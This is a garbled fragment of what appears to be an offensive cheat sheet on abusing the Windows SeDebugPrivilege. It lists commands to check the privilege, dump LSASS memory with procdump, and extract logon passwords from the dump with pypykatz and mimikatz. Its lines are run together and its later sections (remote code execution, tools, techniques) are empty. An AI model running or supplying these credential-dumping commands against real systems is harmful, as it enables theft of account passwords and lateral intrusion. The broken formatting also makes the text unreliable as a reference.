sedebugprivilege
Check seDebugPrivilege privilege
seDebugPrivilege privilegewhoami /privDumping LSASS process credentials
procdump.exe -accepteula -ma lsass.exe lsass.dmppypykatz lsa minidump lsass.dmpmimikatz.exe
log
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswordsRemote Code Execution using "SeDebugPrivilege"
Tools:
Techniques:
Last updated